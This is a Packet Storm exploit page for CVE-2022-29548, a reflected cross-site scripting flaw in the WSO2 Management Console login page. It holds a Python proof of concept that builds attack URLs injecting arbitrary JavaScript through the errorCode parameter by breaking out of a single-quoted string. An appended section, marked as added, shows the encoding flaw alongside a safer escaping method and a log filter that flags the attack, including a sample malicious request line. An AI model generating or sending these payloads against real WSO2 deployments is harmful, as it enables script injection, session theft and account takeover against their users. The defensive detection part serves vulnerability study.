WSO2 Management Console Cross Site Scripting

Posted Jun 27, 2022
Authored by cxosmo

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

tags | exploit, xss
advisories | CVE-2022-29548
SHA-256 | 209bab2c58dfce94eee51b7eb0b2675f337036396419fe6c59da3c84e1861a31

# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)
# Date: 21 Apr 2022
# Exploit Author: cxosmo
# Vendor Homepage: https://wso2.com
# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)
# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;
# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;
# API Microgateway 2.2.0;
# Data Analytics Server 3.2.0;
# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;
# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;
# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;
# Identity Server Analytics 5.5.0 and 5.6.0;
# WSO2 Micro Integrator 1.0.0.
# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)
# CVE: CVE-2022-29548

import argparse
import logging
import urllib.parse

# Global variables
VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="
DEFAULT_PAYLOAD = "alert(document.domain)"

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()


def generate_payload(url, custom_payload=False):
    # Print the crafted GET URL (%27 is a URL-encoded single quote)
    log.info(f"Generating payload for {url}...")
    if custom_payload:
        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")
    else:
        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")


def clean_url_input(url):
    # Reduce any user-supplied path to scheme://host[:port]
    if url.count("/") > 2:
        return f"{url.split('/')[0]}//{url.split('/')[2]}"
    else:
        return url


def check_payload(payload):
    # ", < and > are HTML-entity encoded by the application, so reject them;
    # otherwise URL-encode the payload for use in the query string
    encoded_characters = ['"', '<', '>']
    if any(character in payload for character in encoded_characters):
        log.info("Unsupported character(s) (\", <, >) found in payload.")
        return False
    else:
        return urllib.parse.quote(payload)


if __name__ == "__main__":
    # Parse command line
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
    required_arguments = parser.add_argument_group('required arguments')
    required_arguments.add_argument("-t", "--target",
                                    help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",
                                    required=True, action="store")
    parser.add_argument("-p", "--payload",
                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",
                        action="store", default=False)
    args = parser.parse_args()

    # Clean user target input
    args.target = clean_url_input(args.target.lower())

    # Check for unsupported characters in custom payload; URL-encode as required
    if args.payload:
        args.payload = check_payload(args.payload)
    if args.payload:
        generate_payload(args.target, args.payload)
    else:
        generate_payload(args.target)
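Added example, not part of the advisory or of WSO2's code, in Python like the PoC above. A constructed `showError(...)` stand-in for the JSP (an assumption, not the real template) shows why entity-encoding only `"`, `<` and `>` leaves a single-quoted JavaScript string open while JSON-escaping for the JS-string context does not, and a small filter over constructed access-log lines flags requests to the login page whose errorCode carries the single quote such a breakout needs.

```python
import json
import re
from urllib.parse import urlparse, unquote

def entity_encode_partial(value):
    """Mimics the encoding the advisory describes: only ", < and > become entities."""
    return value.replace('"', "&quot;").replace("<", "&lt;").replace(">", "&gt;")

def render_unsafe(error_code):
    # Constructed stand-in for the JSP (not WSO2's code): the partially encoded
    # value lands inside a single-quoted JavaScript string literal.
    return f"showError('{entity_encode_partial(error_code)}');"

def render_safe(error_code):
    # Encode for the JS-string context instead: json.dumps escapes quotes,
    # backslashes and control characters; escaping "/" also defuses </script>.
    literal = json.dumps(error_code).replace("/", "\\/")
    return f"showError({literal});"

def escapes_string_context(rendered, quote):
    """True if the input terminated the string literal early (a breakout)."""
    i = rendered.index(quote) + 1
    while i < len(rendered):
        if rendered[i] == quote:
            return rendered[i + 1:] != ");"
        i += 2 if rendered[i] == "\\" else 1  # skip escaped characters
    return True  # unterminated literal: still not one clean string

ACCESS_LOG = [  # constructed sample lines in Combined Log Format
    '10.0.0.5 - - [27/Jun/2022:10:00:01 +0000] "GET /carbon/admin/login.jsp?loginStatus=false&errorCode=login.fail HTTP/1.1" 200 5120',
    '10.0.0.9 - - [27/Jun/2022:10:00:07 +0000] "GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1" 200 5133',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_error_codes(log_lines):
    """Decoded errorCode values sent to the login page that carry a single quote."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        url = urlparse(m.group(1)) if m else None
        if url is None or not url.path.endswith("/carbon/admin/login.jsp"):
            continue
        for pair in url.query.split("&"):  # manual split: same on every Python 3
            key, _, value = pair.partition("=")
            if key == "errorCode" and "'" in unquote(value):
                hits.append(unquote(value))
    return hits
```

Running `suspicious_error_codes(ACCESS_LOG)` returns only the second request's decoded errorCode; the first, benign, value passes through `render_unsafe` without leaving the string literal.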

© 2022 Packet Storm. All rights reserved.